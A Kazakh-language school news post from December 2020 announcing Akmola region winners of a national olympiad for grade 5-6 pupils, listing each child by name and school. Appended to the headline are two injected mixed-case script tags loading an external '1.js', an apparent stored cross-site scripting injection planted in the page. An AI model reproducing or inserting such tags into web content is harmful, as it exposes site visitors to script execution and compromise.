Математика, жаратылыстану, қазақ тілі мен әдебиеті, орыс тілі мен әдебиеті, ағылшын тілі, Қазақстан тарихы пәндері бойынша 5-6 сынып оқушыларына арналған республикалық олимпиадасының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.12.2020

Жалпы білім беру мекемелері білім алушыларының шығармашылық қабілеттерін және танымдық қызметке қызығушылығын анықтау және дамытуғ дарынды балаларды қолдау үшін қажеьтті жағдай жасау, сондай-ақ ғылыми білімді насихаттау мақсатында Қазақстан Республикасы Білім және ғылым министрлігі «Дарын» республикалық ғылыми-практикалық орталығының ұйымдастыруымен 2020 жылғы 23 желтоқсан күні математика, жаратылыстану, қазақ тілі мен әдебиеті, орыс тілі мен әдебиеті, ағылшын тілі, Қазақстан тарихы пәндері бойынша 5-6 сынып оқушыларына арналған республикалық олимпиадасы эпидемиологиялық ахуалға байланысты онлайн режимінде өткізілді.

Олимпиадаға Ақмола облысынан облыстық іріктеу кезеңнен өткен 24 оқушы қатысты.

Олимпиада қорытындысының нәтижесінде Ақмола облысының қоржыны бес І-орынмен, алты ІІ-орынмен, сегіз ІІІ-орынмен және үш грамотамен толықты.

І-дәрежелі диплом иеленген оқушылар:

  1. Жаббар Еңлік - Ерейментау ауданы, Н.Смагулов атындағы №2 орта мектеп-лицейінің 5 сынып оқушысы;
  2. Серікберген Іңкәр - Ақкөл ауданы, Азат орта мектебінің 6 сынып оқушысы;
  3. Жұманбай Дәулет - Жарқайың ауданы, Өмірлік негізгі мектебінің 6 сынып оқушысы;
  4. Нурпейіс Асия  - Бурабай ауданы, Оқжетпес орта мектебінің 5 сынып оқушысы;
  5. Городецкая Екатерина - Бурабай ауданы, С.Сейфуллин атындағы орта мектебінің 6 сынып оқушысы.

ІІ-дәрежелі дипломмен марапатталатын оқушылар:

  1. Бейсенбай Әсия - Көкшетау қаласы, № 3 Красный яр көпсалалаы мектеп-гимназиясының 6 сынып оқушысы;
  2. Акишева Гүлназ - Біржан сал ауданы, Абай атындағы  №2 қазақ орта мектебінің 5 сынып оқушысы;
  3. Кизаева Инара - Шортанды ауданы, Шортанды №2 орта мектебінің 5 сынып оқушысы;
  4. Маркелов Даниил - Степногорск қаласы, Абай Құнанбаев атындағы №6 мектеп-гимназиясының 5 сынып оқушысы;
  5. Савельев Глеб - Көкшетау қаласы, № 1 орта мектеп-гимназиясының 5 сынып оқушысы;
  6. Троценко Денис - Ерейментау ауданы, Т.Шаханов атындағы №3 орта мектебінің 6 сынып оқушысы.

ІІІ-дәрежелі дипломдармен марапатталатын оқушылар:

  1. Хуат Ақмарал - Астрахан ауданы, Астрахан №1 орта мектебінің 6 сынып оқушысы;
  2. Нурғамиден Алишер - Жақсы ауданы, Жақсы №1 орта мектебінің 6 сынып оқушысы;
  3. Мухопадова София - Сандықтау ауданы, Лесной орта мектебінің 6 сынып оқушысы;
  4. Щинова Василина - Аршалы ауданы, Ижевск орта мектебінің 5 сынып оқушысы;
  5. Нурушева Анита - Шортанды ауданы, Шортанды №1 орта мектебінің 5 сынып оқушысы;
  6. Колесник Егор - Егіндікөл ауданы, №2 Егіндікөл орта мектебінің 5 сынып оқушысы;
  7. Витт Елизавета - Жақсы ауданы, Перекатный орта мектебінің 5 сынып оқушысы;
  8. Данилова Диляра - Зеренді ауданы, Викторовка орта мектебінің 6 сынып оқушысы.

Грамотамен марапатталатын оқушылар:

  1.  Раимбекова Амина - Жақсы ауданы, Жақсы №1 орта мектебінің 5 сынып оқушысы;
  2. Нығмет Дастан - Астрахан ауданы, Жалтыр №2 орта мектебінің 5 сынып оқушысы;
  3. Молдахметов Адил - Степногорск қаласы, Бестобе кенті негізгі мектебінің 6 сынып оқушысы.

Барлық жеңімпаздарымыз бен жүлдегерлерімізді шын жүректен құттықтап, болашақта биік тұғырлардан көріне берулеріне тілектеспіз!!!

Просмотров: 393


Пікір қосу



Деректерді қолтаңбаға қосу